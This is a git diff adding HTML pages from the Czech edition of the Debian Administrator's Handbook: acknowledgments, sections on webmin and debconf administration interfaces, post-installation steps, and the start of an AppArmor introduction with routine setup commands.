+				Rádi bychom poděkovali všem, kteří se připojili k těmto kampaním veřejného financování, buďto tím, že poskytli nějaké peníze, nebo tím, že se zmínili ve svém okolí. Bez vás bychom to nezvládli.
+			</div><div
+            class="para">
+				To save some paper, 5 years after the fundraising campaigns and after two subsequent editions, we dropped the list of persons who opted to be rewarded with a mention of their name in the book. But their names are engraved in the acknowledgments of the Wheezy edition of the book: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://debian-handbook.info/browse/wheezy/sect.acknowledgments.html">https://debian-handbook.info/browse/wheezy/sect.acknowledgments.html</a></div>
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.3"></a>5.2. Zvláštní poděkování přispěvatelům</h3></div></div></div><div
+            class="para">
+				Tato kniha by nebyla tím, čím je, bez přispění několika osob, které hrály důležitou roli během překladatelské fáze i mimo ni. Rádi bychom poděkovali Marilyne Brun, která nám pomohla přeložit vzorovou kapitolu a která s námi pracovala na definování některých společných překladatelských pravidel. Revidovala také několik kapitol, které zoufale potřebovaly dopracovat. Děkuji Anthony Baldwinovi (z Baldwin Linguas), který pro nás překládal několik kapitol.
+			</div><div
+            class="para">
+				Těžíme z velkorysé pomoci korektorů: Daniel Phillips, Gerold Rupprecht, Gordon ony, Jákob Owens, a tom Syroid. Každý z nich zrevidoval mnoho kapitol. Mockrát děkuji!
+			</div><div
+            class="para">
+				Poté, co anglická verze byla uvolněna, jsme samozřejmě dostali spoustu ohlasů, návrhů na opravy od čtenářů, a ještě více od mnoha týmů, které se zavázali přeložit tuto knihu do ostatních jazyků. Díky!
+			</div><div
+            class="para">
+				Chtěli bychom také poděkovat čtenářům francouzské knihy, kteří nám poskytli ohlasy, co potvrzovaly, že kniha opravdu stála za to ji přeložit, děkuji: Christian Perrier, David Bercot, Étienne Liétart, a Gilles Roussi. Stefano Zacchiroli - který byl vedoucím projektu Debian během kampaně veřejného financování - si také zaslouží velké poděkování, on laskavě schválil projekt s vysvětlujícím sdělením, že svobodné (as in freedom) knihy bylo více než třeba.
+			</div><div
+            class="para">
+				Máte-li to potěšení číst tyto řádky v brožované kopii knihy, pak byste se měli připojit k nám a poděkovat Benoît Guillonovi, Jean-Côme Charpentierovi, a Sébastienu Menginovi, kteří pracovali na vnitřním designu knihy. Benoît je upstream autor <a
+              href="http://dblatex.sourceforge.net"> dblatexu </a> — nástroje, který jsme použili pro převedení DocBooku na LaTeX (a pak PDF). Sébastien je designér, který vytvořil tento pěkný knižní layout a Jean-Côme je odborník na LaTeX, který jej implementoval jako StyleSheet použitelný s dblatexem. Děkuji vám kluci za všechnu tvrdou práci!
+			</div><div
+            class="para">
+				A konečně, děkuji Thierry Stempfelovi za pěkné obrázky uvádějící každou kapitolu, a děkuji Doru Patrascoci za krásný obal této knihy.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.4"></a>5.3. Díky překladatelům</h3></div></div></div><div
+            class="para">
+				Ever since the book has been freed, many volunteers have been busy translating it to numerous languages, such as Arabic, Brazilian Portuguese, German, Italian, Spanish, Japanese, Norwegian Bokmål, etc. Discover the full list of translations on the book's website: <a
+              href="http://debian-handbook.info/get/#other">http://debian-handbook.info/get/#other</a>
+			</div><div
+            class="para">
+				Rádi bychom poděkovali všem překladatelům a recenzentům překladů. Vaše práce je vysoce ceněna, protože přináší Debian do rukou miliónů lidí, kteří neumí číst anglicky.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.5"></a>5.4. Osobní poděkování od Raphaëla</h3></div></div></div><div
+            class="para">
+				Za prvé, rád bych poděkoval Natovi Makarévitchovi, který mi nabídl možnost napsat tuto knihu a který mi poskytl pevné vedení, během roku, který byl potřeba k jejímu dokončení. Děkuji také bezva týmu v Eyrolles, a Muriele Shan SEI Fanové zejména. Byla se mnou velmi trpělivá a hodně jsem se s ní naučil.
+			</div><div
+            class="para">
+				Období kampaní na Ulule bylo pro mě velmi náročné, ale chtěl bych poděkovat všem, kteří pomáhali, aby byly úspěšné, a zejména týmu Ulule, který reagoval velmi rychle na mnoho mých požadavků. Děkuji také všem, kteří propagovali tyto akce. Nemám žádný vyčerpávající seznam (a kdybych měl, byl by pravděpodobně příliš dlouhý), ale rád bych poděkoval několika lidem, kteří se mnou byli v kontaktu: Joey-Elijah Sneddon a Benjamin Humphrey z OMG! Ubuntu, Florent Zara z LinuxFr.org, Manu z Korben.info, Frédéric Couchet z April.org, Jake Edge z Linux Weekly News, Clement Lefebvre z Linux Mint, Ladislav Bodnar z DistroWatch, Steve kemp z Debian-Administration.org, Christian Pfeiffer Jensen z Debian-News.net, Artem Nosulchik z LinuxScrew.com, Stephan Ramoin z Gandi.net, Matthew Bloch z Bytemark.co.uk, tým na Divergence FM, Rikki Kite z Linux New Media, Jono Bacon, marketingový tým Eyrolles, a mnoho dalších, na které jsem zapomněl (omlouvám se za to).
+			</div><div
+            class="para">
+				Chtěl bych se zaměřit na zvláštní poděkování Rolandu Masovi, mému spoluautorovi. Spolupracujeme na této knize od začátku a on byl vždy připraven na tuto výzvu. A musím říci, že dokončení Administrátorské příručky bylo hodně práce...
+			</div><div
+            class="para">
+				V neposlední řadě děkuji své manželce Sophii. Ona mě velmi podporuje v mé práci na této knize a na Debianu všeobecně. Bylo příliš mnoho dní (a nocí), kdy jsem ji nechal samotnou s našimi dvěma syny, abych v práci na knize udělal nějaký pokrok. Jsem vděčný za její podporu a vím, jaké mám štěstí, že ji mám.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.3.9.6"></a>5.5. Osobní poděkování od Rolanda</h3></div></div></div><div
+            class="para">
+				Takže Raphaël mě už předešel ve většině poděkování. Stejně ještě zdůrazím své osobní poděkování dobrým lidem v Eyrolles, s nimiž spolupráce byla vždy příjemná a snadná. Doufejme, že výsledky jejich vynikajícího sdělení nebyly ztraceny v překladu.
+			</div><div
+            class="para">
+				Jsem nesmírně vděčný Raphaëlovi za převzetí administrativní části tohoto anglického vydání. Od organizování kampaně na financování po poslední detaily rozvržení knihy, vydávat přeloženou knihu je mnohem víc než jen překládání a korektury, a Raphaël udělal (nebo delegoval a kontroloval) to všechno. Takže díky.
+			</div><div
+            class="para">
+				Děkujeme také všem, kteří více či méně přímo přispěli k této knize, tím, že poskytnuli objasnění nebo vysvětlení, nebo překladatelské rady. Je jich příliš mnoho na to je zmínit, ale většinu z nich lze obvykle nalézt na různých #debian-* IRC kanálech.
+			</div><div
+            class="para">
+				Je tu samozřejmě určité překrytí s předchozí skupinou lidí, ale zvláštní poděkování je jistě v pořádku lidem, kteří nyní dělají Debian. Bez nich by z knihy moc nebylo, a já jsem stále ohromen tím, co projekt Debian jako celek produkuje a zpřístupňuje každému a všem.
+			</div><div
+            class="para">
+				Další osobní poděkování patří mým přátelům a mým klientům, za jejich porozumění, když jsem byl méně vstřícný, protože jsem pracoval na této knize, a také pro jejich neustálou podporu, povzbuzení a hecování. Oni vědí o kom mluvím. Díky.
+			</div><div
+            class="para">
+				And finally; I am sure they would be surprised by being mentioned here, but I would like to extend my gratitude to Terry Pratchett, Jasper Fforde, Tom Holt, William Gibson, Neal Stephenson, and of course the late Douglas Adams. The countless hours I spent enjoying their books are directly responsible for my being able to take part in translating one first and writing new parts later.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.book-structure.html"><strong>Předcházející</strong>4. truktura knihy</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="the-debian-project.html"><strong>Další</strong>Kapitola 1. Projekt Debian</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.administration-interfaces.html b/tmp/cs-CZ/html/sect.administration-interfaces.html
new file mode 100644
index 000000000..9b6bc6775
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.administration-interfaces.html
@@ -0,0 +1,217 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.4. Administration Interfaces</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.rights-management.html"
+        title="9.3. Managing Rights" /><link
+        rel="next"
+        href="sect.syslog.html"
+        title="9.5. syslog System Events" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.administration-interfaces.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rights-management.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.syslog.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.administration-interfaces"></a>9.4. Administration Interfaces</h2></div></div></div><a
+          id="id-1.12.7.2"
+          class="indexterm"></a><a
+          id="id-1.12.7.3"
+          class="indexterm"></a><div
+          class="para">
+			Using a graphical interface for administration is interesting in various circumstances. An administrator does not necessarily know all the configuration details for all their services, and doesn't always have the time to go seeking out the documentation on the matter. A graphical interface for administration can thus accelerate the deployment of a new service. It can also simplify the setup of services which are hard to configure.
+		</div><div
+          class="para">
+			Such an interface is only an aid, and not an end in itself. In all cases, the administrator must master its behavior in order to understand and work around any potential problem.
+		</div><div
+          class="para">
+			Since no interface is perfect, you may be tempted to try several solutions. This is to be avoided as much as possible, since different tools are sometimes incompatible in their work methods. Even if they all aim to be very flexible and try to adopt the configuration file as a single reference, they are not always able to integrate external changes.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.webmin"></a>9.4.1. Administrating on a Web Interface: <code
+                    class="command">webmin</code></h3></div></div></div><a
+            id="id-1.12.7.7.2"
+            class="indexterm"></a><div
+            class="para">
+				This is, without a doubt, one of the most successful administration interfaces. It is a modular system managed through a web browser, covering a wide array of areas and tools. Furthermore, it is internationalized and available in many languages.
+			</div><div
+            class="para">
+				Sadly, <code
+              class="command">webmin</code> is no longer part of Debian. Its Debian maintainer — Jaldhar H. Vyas — removed the packages he created because he no longer had the time required to maintain them at an acceptable quality level. Nobody has officially taken over, so <span
+              class="distribution distribution">Jessie</span> does not have the <code
+              class="command">webmin</code> package.
+			</div><div
+            class="para">
+				There is, however, an unofficial package distributed on the <code
+              class="literal">webmin.com</code> website. Contrary to the original Debian packages, this package is monolithic; all of its configuration modules are installed and activated by default, even if the corresponding service is not installed on the machine.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> Changing the root password</strong></p></div></div></div><div
+              class="para">
+				On the first login, identification is conducted with the root username and its usual password. It is recommended to change the password used for <code
+                class="command">webmin</code> as soon as possible, so that if it is compromised, the root password for the server will not be involved, even if this confers important administrative rights to the machine.
+			</div><div
+              class="para">
+				Beware! Since <code
+                class="command">webmin</code> has so many features, a malicious user accessing it could compromise the security of the entire system. In general, interfaces of this kind are not recommended for important systems with strong security constraints (firewall, sensitive servers, etc.).
+			</div></div><div
+            class="para">
+				Webmin is used through a web interface, but it does not require Apache to be installed. Essentially, this software has its own integrated mini web server. This server listens by default on port 10000 and accepts secure HTTP connections.
+			</div><div
+            class="para">
+				Included modules cover a wide variety of services, among which:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						all base services: creation of users and groups, management of <code
+                    class="filename">crontab</code> files, init scripts, viewing of logs, etc.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						bind: DNS server configuration (name service);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						postfix: SMTP server configuration (e-mail);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						inetd: configuration of the <code
+                    class="command">inetd</code> super-server;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						quota: user quota management;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						dhcpd: DHCP server configuration;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						proftpd: FTP server configuration;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						samba: Samba file server configuration;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						software: installation or removal of software from Debian packages and system updates.
+					</div></li></ul></div><div
+            class="para">
+				The administration interface is available in a web browser at <code
+              class="literal">https://localhost:10000</code>. Beware! Not all the modules are directly usable. Sometimes they must be configured by specifying the locations of the corresponding configuration files and some executable files (program). Frequently the system will politely prompt you when it fails to activate a requested module.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> GNOME control center</strong></p></div></div></div><a
+              id="id-1.12.7.7.11.2"
+              class="indexterm"></a><div
+              class="para">
+				The GNOME project also provides multiple administration interfaces that are usually accessible via the “Settings” entry in the user menu on the top right. <code
+                class="command">gnome-control-center</code> is the main program that brings them all together but many of the system wide configuration tools are effectively provided by other packages (<span
+                class="pkg pkg">accountsservice</span>, <span
+                class="pkg pkg">system-config-printer</span>, etc.). Although they are easy to use, these applications cover only a limited number of base services: user management, time configuration, network configuration, printer configuration, and so on.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.debconf"></a>9.4.2. Configuring Packages: <code
+                    class="command">debconf</code></h3></div></div></div><a
+            id="id-1.12.7.8.2"
+            class="indexterm"></a><a
+            id="id-1.12.7.8.3"
+            class="indexterm"></a><div
+            class="para">
+				Many packages are automatically configured after asking a few questions during installation through the Debconf tool. These packages can be reconfigured by running <code
+              class="command">dpkg-reconfigure <em
+                class="replaceable">package</em></code>.
+			</div><div
+            class="para">
+				For most cases, these settings are very simple; only a few important variables in the configuration file are changed. These variables are often grouped between two “demarcation” lines so that reconfiguration of the package only impacts the enclosed area. In other cases, reconfiguration will not change anything if the script detects a manual modification of the configuration file, in order to preserve these human interventions (because the script can't ensure that its own modifications will not disrupt the existing settings).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DEBIAN POLICY</em></span> Preserving changes</strong></p></div></div></div><div
+              class="para">
+				The Debian Policy expressly stipulates that everything should be done to preserve manual changes made to a configuration file, so more and more scripts take precautions when editing configuration files. The general principle is simple: the script will only make changes if it knows the status of the configuration file, which is verified by comparing the checksum of the file against that of the last automatically generated file. If they are the same, the script is authorized to change the configuration file. Otherwise, it determines that the file has been changed and asks what action it should take (install the new file, save the old file, or try to integrate the new changes with the existing file). This precautionary principle has long been unique to Debian, but other distributions have gradually begun to embrace it.
+			</div><div
+              class="para">
+				The <code
+                class="command">ucf</code> program (from the Debian package of the same name) can be used to implement such a behavior.
+			</div><a
+              id="id-1.12.7.8.6.4"
+              class="indexterm"></a></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rights-management.html"><strong>Předcházející</strong>9.3. Managing Rights</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.syslog.html"><strong>Další</strong>9.5. syslog System Events</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.after-first-boot.html b/tmp/cs-CZ/html/sect.after-first-boot.html
new file mode 100644
index 000000000..a32fab801
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.after-first-boot.html
@@ -0,0 +1,171 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">4.3. After the First Boot</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Installation, Partitioning, Formatting, File System, Boot Sector, Hardware Detection" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="installation.html"
+        title="Kapitola 4. Installation" /><link
+        rel="prev"
+        href="sect.installation-steps.html"
+        title="4.2. Installing, Step by Step" /><link
+        rel="next"
+        href="packaging-system.html"
+        title="Kapitola 5. Packaging System: Tools and Fundamental Principles" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.after-first-boot.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.installation-steps.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="packaging-system.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.after-first-boot"></a>4.3. After the First Boot</h2></div></div></div><div
+          class="para">
+			If you activated the task “Debian desktop environment” without any explicit desktop choice (or with the “GNOME” choice), the computer will display the <code
+            class="command">gdm3</code> login manager.
+		</div><div
+          class="figure"><a
+            xmlns=""
+            id="id-1.7.13.3"></a><div
+            class="figure-contents"><div
+              class="mediaobject"><img
+                src="images/inst-gdm.png"
+                alt="First boot" /></div></div><p
+            class="title"><strong>Obrázek 4.14. First boot</strong></p></div><div
+          class="para">
+			The user that has already been created can then log in and begin working immediately.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.13.5"></a>4.3.1. Installing Additional Software</h3></div></div></div><div
+            class="para">
+				The installed packages correspond to the profiles selected during installation, but not necessarily to the use that will actually be made of the machine. As such, you might want to use a package management tool to refine the selection of installed packages. The two most frequently used tools (which are installed if the “Debian desktop environment” profile was chosen) are <code
+              class="command">apt</code> (accessible from the command line) and <code
+              class="command">synaptic</code> (“Synaptic Package Manager” in the menus).
+			</div><div
+            class="para">
+				To facilitate the installation of coherent groups of programs, Debian creates “tasks” that are dedicated to specific uses (mail server, file server, etc.). You already had the opportunity to select them during installation, and you can access them again thanks to package management tools such as <code
+              class="command">aptitude</code> (the tasks are listed in a distinct section) and <code
+              class="command">synaptic</code> (through the menu <span
+              class="guimenu"><strong>Edit</strong></span> → <span
+              class="guimenuitem"><strong>Mark Packages by Task…</strong></span>).
+			</div><div
+            class="para">
+				Aptitude is an interface to APT in full-screen text mode. It allows the user to browse the list of available packages according to various categories (installed or not-installed packages, by task, by section, etc.), and to view all of the information available on each of them (dependencies, conflicts, description, etc.). Each package can be marked “install” (to be installed, <span
+              class="keycap"><strong>+</strong></span> key) or “remove” (to be removed, <span
+              class="keycap"><strong>-</strong></span> key). All of these operations will be conducted simultaneously once you've confirmed them by pressing the <span
+              class="keycap"><strong>g</strong></span> key (“g” for “go!”). If you have forgotten some programs, no worries; you will be able to run <code
+              class="command">aptitude</code> again once the initial installation has been completed.
+			</div><a
+            id="id-1.7.13.5.5"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Debian thinks of speakers of non-English languages</strong></p></div></div></div><div
+              class="para">
+				Several tasks are dedicated to the localization of the system in other languages beyond English. They include translated documentation, dictionaries, and various other packages useful for speakers of different languages. The appropriate task is automatically selected if a non-English language was chosen during installation.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> <code
+                        class="command">dselect</code>, the old interface to install packages</strong></p></div></div></div><div
+              class="para">
+				Before <code
+                class="command">aptitude</code>, the standard program to select packages to be installed was <code
+                class="command">dselect</code>, the old graphical interface associated with <code
+                class="command">dpkg</code>. Being a difficult program for beginners to use, it is not recommended.
+			</div><a
+              id="id-1.7.13.5.7.3"
+              class="indexterm"></a></div><div
+            class="para">
+				Of course, it is possible not to select any task to be installed. In this case, you can manually install the desired software with the <code
+              class="command">apt</code> or <code
+              class="command">aptitude</code> command (which are both accessible from the command line).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Package dependencies, conflicts</strong></p></div></div></div><div
+              class="para">
+				In the Debian packaging lingo, a “dependency” is another package necessary for the proper functioning of the package in question. Conversely, a “conflict” is a package that can not be installed side-by-side with another.
+			</div><div
+              class="para">
+				These concepts are discussed in greater detail in <a
+                class="xref"
+                href="packaging-system.html">5 – „<em>Packaging System: Tools and Fundamental Principles</em>“</a>.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.7.13.6"></a>4.3.2. Upgrading the System</h3></div></div></div><a
+            id="id-1.7.13.6.2"
+            class="indexterm"></a><div
+            class="para">
+				A first <code
+              class="command">apt upgrade</code> (a command used to automatically update installed programs) is generally required, especially for possible security updates issued since the release of the latest Debian stable version. These updates may involve some additional questions through <code
+              class="command">debconf</code>, the standard Debian configuration tool. For further information on these updates conducted by <code
+              class="command">apt</code>, please refer to <a
+              class="xref"
+              href="sect.apt-get.html#sect.apt-upgrade">6.2.3 – „System Upgrade“</a>.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.installation-steps.html"><strong>Předcházející</strong>4.2. Installing, Step by Step</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="packaging-system.html"><strong>Další</strong>Kapitola 5. Packaging System: Tools and Fundament...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.apparmor.html b/tmp/cs-CZ/html/sect.apparmor.html
new file mode 100644
index 000000000..b3ea36a71
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.apparmor.html
@@ -0,0 +1,520 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.4. Introduction to AppArmor</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.supervision.html"
+        title="14.3. Supervision: Prevention, Detection, Deterrence" /><link
+        rel="next"
+        href="sect.selinux.html"
+        title="14.5. Introduction to SELinux" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.apparmor.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.supervision.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.selinux.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.apparmor"></a>14.4. Introduction to AppArmor</h2></div></div></div><a
+          id="id-1.17.7.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apparmor-principles"></a>14.4.1. Principles</h3></div></div></div><div
+            class="para">
+				AppArmor is a <span
+              class="emphasis"><em>Mandatory Access Control</em></span> (MAC) system built on Linux's LSM (<span
+              class="emphasis"><em>Linux Security Modules</em></span>) interface. In practice, the kernel queries AppArmor before each system call to know whether the process is authorized to do the given operation. Through this mechanism, AppArmor confines programs to a limited set of resources.
+			</div><a
+            id="id-1.17.7.3.3"
+            class="indexterm"></a><a
+            id="id-1.17.7.3.4"
+            class="indexterm"></a><div
+            class="para">
+				AppArmor applies a set of rules (known as “profile”) on each program. The profile applied by the kernel depends on the installation path of the program being executed. Contrary to SELinux (discussed in <a
+              class="xref"
+              href="sect.selinux.html">14.5 – „Introduction to SELinux“</a>), the rules applied do not depend on the user. All users face the same set of rules when they are executing the same program (but traditional user permissions still apply and might result in different behaviour!).
+			</div><div
+            class="para">
+				AppArmor profiles are stored in <code
+              class="filename">/etc/apparmor.d/</code> and they contain a list of access control rules on resources that each program can make use of. The profiles are compiled and loaded into the kernel by the <code
+              class="command">apparmor_parser</code> command. Each profile can be loaded either in enforcing or complaining mode. The former enforces the policy and reports violation attempts, while the latter does not enforce the policy but still logs the system calls that would have been denied.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apparmor-setup"></a>14.4.2. Enabling AppArmor and managing AppArmor profiles</h3></div></div></div><div
+            class="para">
+				AppArmor support is built into the standard kernels provided by Debian. Enabling AppArmor is thus just a matter of installing a few packages and adding some parameters to the kernel command line:
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>apt install apparmor apparmor-profiles apparmor-utils
+</code></strong><code
+              class="computeroutput">[...]
+# </code><strong
+              class="userinput"><code>perl -pi -e 's,GRUB_CMDLINE_LINUX="(.*)"$,GRUB_CMDLINE_LINUX="$1 apparmor=1 security=apparmor",' /etc/default/grub
+</code></strong><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>update-grub
+</code></strong></pre><div
+            class="para">
+				After a reboot, AppArmor is now functional and <code
+              class="command">aa-status</code> will confirm it quickly:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>aa-status</code></strong>
+<code
+              class="computeroutput">apparmor module is loaded.
+44 profiles are loaded.
+9 profiles are in enforce mode.
+   /usr/bin/lxc-start
+   /usr/lib/chromium-browser/chromium-browser//browser_java
+[...]
+35 profiles are in complain mode.
